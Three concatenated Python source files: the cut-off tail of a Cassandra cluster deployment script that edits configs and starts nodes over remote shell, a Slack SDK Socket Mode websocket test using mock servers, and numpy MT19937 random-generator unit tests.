            return rpc(pub, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
        # Update seeds.
        seeds_orig = 'seeds: "127.0.0.1"'
        seeds_new = 'seeds: "%s"' % ','.join([x for x, y in seeds])
        _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (seeds_orig, seeds_new, configs_dir))
        # Update listener.
        listener_orig = 'listen_address: localhost'
        listener_new = 'listen_address: %s' % priv
        _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (listener_orig, listener_new, configs_dir))
        # Update rpc address.
        rpc_orig = 'rpc_address: localhost'
        rpc_new = 'rpc_address: %s' % priv
        _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (rpc_orig, rpc_new, configs_dir))
        # Update data location. Slashes are escaped for the sed pattern.
        data_orig = '/var/lib/cassandra/data'.replace('/', '\\/')
        data_new = '%s' % args.cass_data_location.replace('/', '\\/')
        _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (data_orig, data_new, configs_dir))
        # Update commitlog location.
        commit_orig = '/var/lib/cassandra/commitlog'.replace('/', '\\/')
        commit_new = '%s' % args.cass_commitlog_location.replace('/', '\\/')
        _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (commit_orig, commit_new, configs_dir))
        # Optionally switch on password authentication/authorization.
        if args.cass_auth:
            auth_orig = 'authenticator: AllowAllAuthenticator'
            auth_new = 'authenticator: PasswordAuthenticator'
            _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (auth_orig, auth_new, configs_dir))
            auth_orig = 'authorizer: AllowAllAuthorizer'
            auth_new = 'authorizer: CassandraAuthorizer'
            _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (auth_orig, auth_new, configs_dir))
        # Update JMX port.
        jmx_orig = 'JMX_PORT="7199"'
        jmx_new = 'JMX_PORT="%s"' % args.jmx_port
        _rpc("sudo sed -i 's/%s/%s/g' %s/cassandra-env.sh" % (jmx_orig, jmx_new, configs_dir))

    # Start a progress bar if not in verbose mode.
    if not args.verbose:
        e = threading.Event()
        bar_thread = threading.Thread(target=progress_bar, args=('Updating Cassandra settings.', e))
        bar_thread.setDaemon(True)
        bar_thread.start()

    # Spawn threads to run instructions on all nodes at once
    threads = []
    for pub, priv in ips:
        t = threading.Thread(target=_single_node_set_yaml, args=(pub, priv))
        t.setDaemon(True)
        t.start()
        threads.append(t)

    # Wait for all threads to complete
    for t in threads:
        t.join()

    # Terminate the progress bar if not in verbose mode.
    if not args.verbose:
        e.set()
        bar_thread.join()
def turn_on(ips, seeds, args):
    """
    Turns on the cassandra nodes. Seeds first and then all nodes.

    :param ips: All (public, private) ip pairs in the cluster.
    :param seeds: Seed (public, private) ip pairs in the cluster.
    :param args: Argparse arguments (dse/user/password/key/verbose are used).
    :return: None
    """
    def _turn_on_single_node(ip):
        # Start either DSE or open-source Cassandra depending on the flag;
        # the resulting command strings are identical to the original branches.
        service = 'dse' if args.dse else 'cassandra'
        rpc(ip, 'sudo service %s start' % service, args.user, args.password,
            args.key, suppress_output=not args.verbose)

    # Start a progress bar if not in verbose mode.
    if not args.verbose:
        e = threading.Event()
        bar_thread = threading.Thread(target=progress_bar,
                                      args=('Starting Cassandra cluster.', e))
        # Thread.setDaemon() is deprecated (removed in 3.13); use the attribute.
        bar_thread.daemon = True
        bar_thread.start()

    # Spawn threads to start all seed nodes at once.
    threads = []
    for pub, priv in seeds:
        t = threading.Thread(target=_turn_on_single_node, args=(pub,))
        t.daemon = True
        t.start()
        threads.append(t)
    # Wait for all seed threads to complete.
    for t in threads:
        t.join()

    if len(ips) > len(seeds):
        time.sleep(40)  # Give time for the seed nodes to come up.

    # Spawn threads to start the remaining (non-seed) nodes.
    threads = []
    for pub, priv in ips:
        if (pub, priv) not in seeds:
            t = threading.Thread(target=_turn_on_single_node, args=(pub,))
            t.daemon = True
            t.start()
            threads.append(t)
            time.sleep(15)  # Slow down startup a bit ... sometimes they get overwhelmed.
    # Wait for all threads to complete.
    for t in threads:
        t.join()

    # Terminate the progress bar if not in verbose mode.
    if not args.verbose:
        e.set()
        bar_thread.join()
def final_report(seeds, args):
    """
    Print a final ``nodetool status`` report queried from the first node.

    :param seeds: List of (public, private) ip pairs; the first entry's
        public ip is the one queried.
    :param args: Argparse arguments (user/password/key/verbose are used).
    :return: None
    """
    # Start a progress bar if not in verbose mode.
    if not args.verbose:
        e = threading.Event()
        bar_thread = threading.Thread(target=progress_bar,
                                      args=('Checking status of cluster.', e))
        # Thread.setDaemon() is deprecated (removed in 3.13); use the attribute.
        bar_thread.daemon = True
        bar_thread.start()

    time.sleep(40)  # Give time for nodes to come up.
    ip = seeds[0][0]
    out, err = rpc(ip, 'nodetool status', args.user, args.password, args.key,
                   suppress_output=not args.verbose)

    # Terminate the progress bar if not in verbose mode.
    if not args.verbose:
        e.set()
        bar_thread.join()
        time.sleep(1)  # Allow other progress bar to complete.
    print('\n%s' % out)
def print_ip_pairs(ip_list):
    """
    Function to standardize printing our (<pub>, <priv>) ip pair tuples.
    :param ip_list: List of (<pub>, <priv>) ip pairs.
    :return: None
    """
    # Header row, padded to the same 15-character columns as the data rows.
    header = '%s %s' % ('<Public>'.ljust(15), '<Private>'.ljust(15))
    print(header)
    for public_ip, private_ip in ip_list:
        row = '%s %s' % (public_ip.ljust(15), private_ip.ljust(15))
        print(row)
def do_welcome():
    """
    Print the ASCII-art welcome banner.
    :return: None
    """
    # NOTE(review): the banner's leading whitespace appears to have been
    # mangled in transit; verify the art's alignment against the original.
    title="""
 _____ _ _
 / ____| | | | |
| | __ ___ _ __ _ __ ___| |_| |_ ____
| | |_ |/ _ \ '_ \| '_ \ / _ \ __| __/ _ |
| |__| | __/ |_) | |_) | __/ |_| || (_) |
\_____|\___| .__/| .__/ \___|\__|\__\___/
| | | |
|_| |_| The Cloud Maestro
"""
    print(title)
def print_license():
    """Print the warranty disclaimer, wrapped to 70 columns inside a banner.

    :return: None
    """
    # Renamed from `license` to avoid shadowing the `license` builtin.
    license_text = """THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."""
    print('*'*70)
    print('%s' % textwrap.fill(license_text, 70))
    print('*'*70)
    print('')
def main():
    """Entry point: parse arguments, show the banner/license, then drive the
    full cluster bring-up (precheck, cleanup, install, configure, start,
    report)."""
    args = parse_input()
    ips = parse_ips(args.cass_ips)
    do_welcome()
    print_license()
    # If more than one node use first two as seed nodes.
    seeds = parse_ips(args.cass_seeds) if args.cass_seeds else None
    if not seeds:
        if len(ips) > 2:
            # NOTE(review): the *private* ip is used for both halves of each
            # seed pair — presumably so seeds are addressed over the internal
            # network; confirm this is intentional.
            seeds = [(ips[0][1], ips[0][1]), (ips[1][1], ips[1][1])]
        else:
            seeds = [(ips[0][1], ips[0][1]),]
    # Print seed and node information.
    print('+ Cassandra node IP addresses:')
    print_ip_pairs(ips)
    print('+ Seed Nodes IP addresses:')
    print_ip_pairs(seeds)
    print('')
    # Do precheck.
    do_pre_check(ips, args)
    # Do cleanup.
    do_cleanup(ips, args)
    # Do install.
    install(ips, args)
    # Set yaml configs.
    set_yaml_configs(ips, seeds, args)
    # Do turn on.
    turn_on(ips, seeds, args)
    # Final report
    # NOTE(review): final_report is passed all ips, not seeds; it queries the
    # first entry, which works because both lists share the same pair shape.
    final_report(ips, args)

if __name__ == "__main__":
    main()
|
test_interactions_websockets.py | import asyncio
import logging
import time
import unittest
from random import randint
from threading import Thread
from typing import Optional
from slack_sdk.socket_mode.request import SocketModeRequest
from slack_sdk.socket_mode.async_client import AsyncBaseSocketModeClient
from slack_sdk.socket_mode.websockets import SocketModeClient
from slack_sdk.web.async_client import AsyncWebClient
from tests.helpers import is_ci_unstable_test_skip_enabled
from tests.slack_sdk.socket_mode.mock_socket_mode_server import (
start_socket_mode_server,
socket_mode_envelopes,
socket_mode_hello_message,
)
from tests.slack_sdk.socket_mode.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
from tests.slack_sdk_async.helpers import async_test
class TestInteractionsWebsockets(unittest.TestCase):
    """End-to-end interaction test for the websockets-based SocketModeClient
    against a local mock Socket Mode server and a mock Web API server."""

    logger = logging.getLogger(__name__)

    def setUp(self):
        # Spin up the mock Web API server and point an async client at it.
        setup_mock_web_api_server(self)
        self.web_client = AsyncWebClient(
            token="xoxb-api_test",
            base_url="http://localhost:8888",
        )

    def tearDown(self):
        cleanup_mock_web_api_server(self)

    @async_test
    async def test_interactions(self):
        # Skipped entirely on CI runs flagged as unstable.
        if is_ci_unstable_test_skip_enabled():
            return

        # NOTE(review): start_socket_mode_server(self, 3002) is *called* here
        # and its return value used as the thread target — presumably the
        # helper returns a runnable; confirm against mock_socket_mode_server.
        t = Thread(target=start_socket_mode_server(self, 3002))
        t.daemon = True
        t.start()

        received_messages = []
        received_socket_mode_requests = []

        async def message_handler(
            receiver: AsyncBaseSocketModeClient,
            message: dict,
            raw_message: Optional[str],
        ):
            self.logger.info(f"Raw Message: {raw_message}")
            # Random delay simulates slow consumers to exercise ordering.
            await asyncio.sleep(randint(50, 200) / 1000)
            received_messages.append(raw_message)

        async def socket_mode_listener(
            receiver: AsyncBaseSocketModeClient,
            request: SocketModeRequest,
        ):
            self.logger.info(f"Socket Mode Request: {request}")
            await asyncio.sleep(randint(50, 200) / 1000)
            received_socket_mode_requests.append(request)

        client = SocketModeClient(
            app_token="xapp-A111-222-xyz",
            web_client=self.web_client,
            auto_reconnect_enabled=False,
        )
        client.message_listeners.append(message_handler)
        client.socket_mode_request_listeners.append(socket_mode_listener)
        try:
            time.sleep(1)  # wait for the server
            client.wss_uri = "ws://0.0.0.0:3002/link"
            await client.connect()
            await asyncio.sleep(1)  # wait for the message receiver

            for _ in range(10):
                await client.send_message("foo")
                await client.send_message("bar")
                await client.send_message("baz")

            # Everything the server echoes back, plus the hello message,
            # plus the 30 messages we sent, compared order-independently.
            expected = (
                socket_mode_envelopes
                + [socket_mode_hello_message]
                + ["foo", "bar", "baz"] * 10
            )
            expected.sort()
            count = 0
            # Poll up to ~10 seconds (50 * 0.2s) for all messages to arrive.
            while count < 10 and len(received_messages) < len(expected):
                await asyncio.sleep(0.2)
                count += 0.2
            received_messages.sort()
            self.assertEqual(received_messages, expected)

            self.assertEqual(
                len(socket_mode_envelopes), len(received_socket_mode_requests)
            )
        finally:
            await client.close()
            # NOTE(review): self.server is presumably attached by
            # start_socket_mode_server / setup helpers — verify.
            self.server.stop()
            self.server.close()
|
test_generator_mt19937.py | import sys
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
    # Parametrized fixture: every test taking `endpoint` runs twice, with
    # True (closed interval) and False (half-open interval) for integers().
    return request.param
class TestSeed:
    """Seeding behaviour of the MT19937 bit generator."""

    def test_scalar(self):
        # Known first draws for scalar seeds at both ends of the 32-bit range.
        for seed, expected in ((0, 479), (4294967295, 324)):
            gen = Generator(MT19937(seed))
            assert_equal(gen.integers(1000), expected)

    def test_array(self):
        # Sequence seeds: equivalent sequences give identical first draws.
        cases = (
            (range(10), 465),
            (np.arange(10), 465),
            ([0], 479),
            ([4294967295], 324),
        )
        for seed, expected in cases:
            gen = Generator(MT19937(seed))
            assert_equal(gen.integers(1000), expected)

    def test_seedsequence(self):
        bit_gen = MT19937(SeedSequence(0))
        assert_equal(bit_gen.random_raw(1), 2058676884)

    def test_invalid_scalar(self):
        # seed must be an unsigned 32 bit integer
        assert_raises(TypeError, MT19937, -0.5)
        assert_raises(ValueError, MT19937, -1)

    def test_invalid_array(self):
        # seed must be an unsigned integer
        assert_raises(TypeError, MT19937, [-0.5])
        assert_raises(ValueError, MT19937, [-1])
        assert_raises(ValueError, MT19937, [1, -2, 4294967296])

    def test_noninstantized_bitgen(self):
        # Passing the class itself (not an instance) must be rejected.
        assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
    """Corner cases of Generator.binomial (module-level `random` generator)."""

    def test_n_zero(self):
        # Tests the corner case of n == 0 for the binomial distribution.
        # binomial(0, p) should be zero for any p in [0, 1].
        # This test addresses issue #3480.
        zeros = np.zeros(2, dtype='int')
        for prob in (0, .5, 1):
            assert_(random.binomial(0, prob) == 0)
            assert_array_equal(random.binomial(zeros, prob), zeros)

    def test_p_is_nan(self):
        # Issue #4571.
        assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
    """Behavioural checks for Generator.multinomial (and a couple of
    integers() interval checks), using the module-level `random` generator."""

    def test_basic(self):
        # Smoke test: a valid call must not raise.
        random.multinomial(100, [0.2, 0.8])

    def test_zero_probability(self):
        # Zero-probability categories are allowed.
        random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])

    def test_int_negative_interval(self):
        # Draws from a fully negative half-open interval stay inside it.
        assert_(-5 <= random.integers(-5, -1) < -1)
        x = random.integers(-5, -1, 5)
        assert_(np.all(-5 <= x))
        assert_(np.all(x < -1))

    def test_size(self):
        # gh-3173
        p = [0.5, 0.5]
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
        assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
        assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
                     (2, 2, 2))
        # A float size is not a valid shape.
        assert_raises(TypeError, random.multinomial, 1, p,
                      float(1))

    def test_invalid_prob(self):
        # Probabilities must lie in [0, 1] and sum to at most 1.
        assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
        assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])

    def test_invalid_n(self):
        # Negative trial counts are rejected, scalar or array.
        assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
        assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])

    def test_p_non_contiguous(self):
        p = np.arange(15.)
        p /= np.sum(p[1::3])
        pvals = p[1::3]
        # Local `random` deliberately shadows the module-level generator so
        # both draws below start from the same fixed seed.
        random = Generator(MT19937(1432985819))
        non_contig = random.multinomial(100, pvals=pvals)
        random = Generator(MT19937(1432985819))
        contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
        assert_array_equal(non_contig, contig)

    def test_multidimensional_pvals(self):
        # pvals must be one-dimensional.
        assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
        assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
        assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
        assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
    """Argument validation, edge cases and repeatability of
    Generator.multivariate_hypergeometric for both sampling methods."""

    def setup(self):
        # Fixed seed shared by the repeatability tests below.
        self.seed = 8675309

    def test_argument_validation(self):
        # Error cases...

        # `colors` must be a 1-d sequence
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      10, 4)

        # Negative nsample
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [2, 3, 4], -1)

        # Negative color
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [-1, 2, 3], 2)

        # nsample exceeds sum(colors)
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [2, 3, 4], 10)

        # nsample exceeds sum(colors) (edge case of empty colors)
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [], 1)

        # Validation errors associated with very large values in colors.
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [999999999, 101], 5, 1, 'marginals')

        int64_info = np.iinfo(np.int64)
        max_int64 = int64_info.max
        max_int64_index = max_int64 // int64_info.dtype.itemsize
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [max_int64_index - 100, 101], 5, 1, 'count')

    @pytest.mark.parametrize('method', ['count', 'marginals'])
    def test_edge_cases(self, method):
        # Set the seed, but in fact, all the results in this test are
        # deterministic, so we don't really need this.
        random = Generator(MT19937(self.seed))

        x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
        assert_array_equal(x, [0, 0, 0])

        x = random.multivariate_hypergeometric([], 0, method=method)
        assert_array_equal(x, [])

        x = random.multivariate_hypergeometric([], 0, size=1, method=method)
        assert_array_equal(x, np.empty((1, 0), dtype=np.int64))

        x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
        assert_array_equal(x, [0, 0, 0])

        x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
        assert_array_equal(x, [3, 0, 0])

        colors = [1, 1, 0, 1, 1]
        x = random.multivariate_hypergeometric(colors, sum(colors),
                                               method=method)
        assert_array_equal(x, colors)

        x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
                                               method=method)
        assert_array_equal(x, [[3, 4, 5]]*3)

    # Cases for nsample:
    #     nsample < 10
    #     10 <= nsample < colors.sum()/2
    #     colors.sum()/2 < nsample < colors.sum() - 10
    #     colors.sum() - 10 < nsample < colors.sum()
    @pytest.mark.parametrize('nsample', [8, 25, 45, 55])
    @pytest.mark.parametrize('method', ['count', 'marginals'])
    @pytest.mark.parametrize('size', [5, (2, 3), 150000])
    def test_typical_cases(self, nsample, method, size):
        random = Generator(MT19937(self.seed))

        colors = np.array([10, 5, 20, 25])
        sample = random.multivariate_hypergeometric(colors, nsample, size,
                                                    method=method)
        if isinstance(size, int):
            expected_shape = (size,) + colors.shape
        else:
            expected_shape = size + colors.shape
        assert_equal(sample.shape, expected_shape)
        assert_((sample >= 0).all())
        assert_((sample <= colors).all())
        # Each row must draw exactly nsample items in total.
        assert_array_equal(sample.sum(axis=-1),
                           np.full(size, fill_value=nsample, dtype=int))
        if isinstance(size, int) and size >= 100000:
            # This sample is large enough to compare its mean to
            # the expected values.
            assert_allclose(sample.mean(axis=0),
                            nsample * colors / colors.sum(),
                            rtol=1e-3, atol=0.005)

    def test_repeatability1(self):
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
                                                    method='count')
        expected = np.array([[2, 1, 2],
                             [2, 1, 2],
                             [1, 1, 3],
                             [2, 0, 3],
                             [2, 1, 2]])
        assert_array_equal(sample, expected)

    def test_repeatability2(self):
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([20, 30, 50], 50,
                                                    size=5,
                                                    method='marginals')
        expected = np.array([[ 9, 17, 24],
                             [ 7, 13, 30],
                             [ 9, 15, 26],
                             [ 9, 17, 24],
                             [12, 14, 24]])
        assert_array_equal(sample, expected)

    def test_repeatability3(self):
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([20, 30, 50], 12,
                                                    size=5,
                                                    method='marginals')
        expected = np.array([[2, 3, 7],
                             [5, 3, 4],
                             [2, 5, 5],
                             [5, 3, 4],
                             [1, 5, 6]])
        assert_array_equal(sample, expected)
class TestSetState:
    """Saving and restoring MT19937 bit-generator state."""

    def setup(self):
        # Capture a generator plus a snapshot of its state for restore tests.
        self.seed = 1234567890
        self.rg = Generator(MT19937(self.seed))
        self.bit_generator = self.rg.bit_generator
        self.state = self.bit_generator.state
        inner = self.state['state']
        self.legacy_state = (self.state['bit_generator'],
                             inner['key'],
                             inner['pos'])

    def test_gaussian_reset(self):
        # Make sure the cached every-other-Gaussian is reset.
        before = self.rg.standard_normal(size=3)
        self.bit_generator.state = self.state
        after = self.rg.standard_normal(size=3)
        assert_(np.all(before == after))

    def test_gaussian_reset_in_media_res(self):
        # When the state is saved with a cached Gaussian, make sure the
        # cached Gaussian is restored.
        self.rg.standard_normal()
        snapshot = self.bit_generator.state
        before = self.rg.standard_normal(size=3)
        self.bit_generator.state = snapshot
        after = self.rg.standard_normal(size=3)
        assert_(np.all(before == after))

    def test_negative_binomial(self):
        # Ensure that the negative binomial results take floating point
        # arguments without truncation.
        self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
    """Exhaustive checks of Generator.integers: bounds validation, extreme
    values, dtype handling and bit-for-bit repeatability. The `endpoint`
    argument on most tests is the module-level pytest fixture (True = closed
    interval, False = half-open)."""

    rfunc = random.integers

    # valid integer/boolean types
    itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
             np.int32, np.uint32, np.int64, np.uint64]

    def test_unsupported_type(self, endpoint):
        # Floating dtypes are rejected outright.
        assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)

    def test_bounds_checking(self, endpoint):
        for dt in self.itype:
            # For each dtype, [lbnd, ubnd) is the full representable range.
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # Out-of-range or inverted bounds must raise, scalar or list form.
            assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, ubnd, lbnd,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
                          dtype=dt)

            assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, 1, [0],
                          endpoint=endpoint, dtype=dt)

    def test_bounds_checking_array(self, endpoint):
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)

            # Same validation with broadcast (array) bounds.
            assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [lbnd] * 2,
                          [ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [1] * 2, 0,
                          endpoint=endpoint, dtype=dt)

    def test_rng_zero_and_extremes(self, endpoint):
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd
            is_open = not endpoint

            # A width-one interval must always return its single value,
            # at the top, bottom and middle of the dtype's range.
            tgt = ubnd - 1
            assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)
            assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)

            tgt = lbnd
            assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)
            assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)

            tgt = (lbnd + ubnd) // 2
            assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)
            assert_equal(self.rfunc([tgt], [tgt + is_open],
                                    size=1000, endpoint=endpoint, dtype=dt),
                         tgt)

    def test_rng_zero_and_extremes_array(self, endpoint):
        size = 1000
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # Same width-one interval checks, with fully-broadcast bounds.
            tgt = ubnd - 1
            assert_equal(self.rfunc([tgt], [tgt + 1],
                                    size=size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)

            tgt = lbnd
            assert_equal(self.rfunc([tgt], [tgt + 1],
                                    size=size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)

            tgt = (lbnd + ubnd) // 2
            assert_equal(self.rfunc([tgt], [tgt + 1],
                                    size=size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)

    def test_full_range(self, endpoint):
        # Test for ticket #1690
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            try:
                self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
            except Exception as e:
                raise AssertionError("No error should have been raised, "
                                     "but one was with the following "
                                     "message:\n\n%s" % str(e))

    def test_full_range_array(self, endpoint):
        # Test for ticket #1690
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            try:
                self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
            except Exception as e:
                raise AssertionError("No error should have been raised, "
                                     "but one was with the following "
                                     "message:\n\n%s" % str(e))

    def test_in_bounds_fuzz(self, endpoint):
        # Don't use fixed seed
        random = Generator(MT19937())

        for dt in self.itype[1:]:
            for ubnd in [4, 8, 16]:
                vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
                                  endpoint=endpoint, dtype=dt)
                assert_(vals.max() < ubnd)
                assert_(vals.min() >= 2)

        vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
                          dtype=bool)
        assert_(vals.max() < 2)
        assert_(vals.min() >= 0)

    def test_scalar_array_equiv(self, endpoint):
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            size = 1000
            # Scalar, length-1 array, and fully-broadcast bounds must produce
            # identical streams when seeded identically.
            random = Generator(MT19937(1234))
            scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
                                     dtype=dt)

            random = Generator(MT19937(1234))
            scalar_array = random.integers([lbnd], [ubnd], size=size,
                                           endpoint=endpoint, dtype=dt)

            random = Generator(MT19937(1234))
            array = random.integers([lbnd] * size, [ubnd] *
                                    size, size=size, endpoint=endpoint, dtype=dt)
            assert_array_equal(scalar, scalar_array)
            assert_array_equal(scalar, array)

    def test_repeatability(self, endpoint):
        import hashlib
        # We use a md5 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but bool, where the range
        # is [0, 2). Hashes are for little endian numbers.
        tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
               'int16': '39624ead49ad67e37545744024d2648b',
               'int32': '5c4810373f979336c6c0c999996e47a1',
               'int64': 'ab126c15edff26f55c50d2b7e37391ac',
               'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
               'uint16': '39624ead49ad67e37545744024d2648b',
               'uint32': '5c4810373f979336c6c0c999996e47a1',
               'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
               'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}

        for dt in self.itype[1:]:
            random = Generator(MT19937(1234))

            # view as little endian for hash
            if sys.byteorder == 'little':
                val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
                                      dtype=dt)
            else:
                val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
                                      dtype=dt).byteswap()

            res = hashlib.md5(val.view(np.int8)).hexdigest()
            assert_(tgt[np.dtype(dt).name] == res)

        # bools do not depend on endianness
        random = Generator(MT19937(1234))
        val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
                              dtype=bool).view(np.int8)
        res = hashlib.md5(val).hexdigest()
        assert_(tgt[np.dtype(bool).name] == res)

    def test_repeatability_broadcasting(self, endpoint):
        for dt in self.itype:
            lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
            ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # view as little endian for hash
            random = Generator(MT19937(1234))
            val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
                                  dtype=dt)

            random = Generator(MT19937(1234))
            val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
                                     dtype=dt)

            assert_array_equal(val, val_bc)

            random = Generator(MT19937(1234))
            val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
                                     endpoint=endpoint, dtype=dt)

            assert_array_equal(val, val_bc)

